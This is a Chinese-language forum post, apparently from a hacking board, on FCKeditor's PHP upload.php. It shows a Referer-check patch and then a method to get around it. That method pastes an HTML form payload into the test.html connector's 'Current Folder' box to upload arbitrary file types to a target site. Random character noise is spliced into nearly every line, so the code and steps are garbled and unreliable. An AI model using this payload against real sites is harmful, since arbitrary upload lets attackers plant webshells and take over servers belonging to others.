漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
3 i$ y2 \' S1 {- Q) J* C( {0 o网上给出的修复方案是
0 l. d! K1 v- g! p' a3 y修复方法,删除FCK编辑器用其他的编辑器
A9 ^ O) o$ T4 Q/ X& a' H& F或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
R- a8 l7 S; `% P! X- N& S1 ~在2 A% Y3 U0 o& d( g) u
require(‘config.php’);5 F3 o& b/ a5 e& B, F% M% M% Y
require(‘util.php’);" V, j4 e7 V, g9 y: J( D& L5 l
的下面添加以下代码—————————–
7 {5 Q+ z% b! U, Y//防止外部提交/ i) c h- F M
function outsidepost()- V( i3 G, ^) e) N+ X+ p% \
{$ \' P. P+ v( H" K+ D2 t
$servername=$_SERVER['SERVER_NAME'];
; T+ T9 P# q/ J$sub_from=@$_SERVER['HTTP_REFERER'];
3 k; H$ [% ], P! s M4 B$sub_len=strlen($servername);. v# `5 ]5 {( F3 V
$checkfrom=substr($sub_from,7,$sub_len);
/ |! b: H5 Y- c* s& F/ H! cif($checkfrom!=$servername){. ]0 k& A* w- i9 N) E* | W6 M
echo(“you don’t outsidepost!”);$ P4 }( L) O6 I. Q, S8 X; v P* {
exit;+ E: [* x! Z/ T+ p
}# e9 P0 z* n$ |9 @: g# W
}
& h! K# O0 }" F4 H5 `, Toutsidepost();9 M; r+ a* h9 |0 J, p; L5 J w
防止外部提交,但是没有防止内部提交," l x/ b$ t' K @; D7 N
利用方法:. S) G/ T& P; x3 G3 Q4 s* S# Q
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
1 _ [! f k: S, U5 g! A+ h1 L2,在Current Folder 框输入( e: x+ B* {0 X) n( ^! @$ p
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>/ _( s7 {; V) ~: ]5 e' _/ ]- g
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。% \$ @7 v- p6 [
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |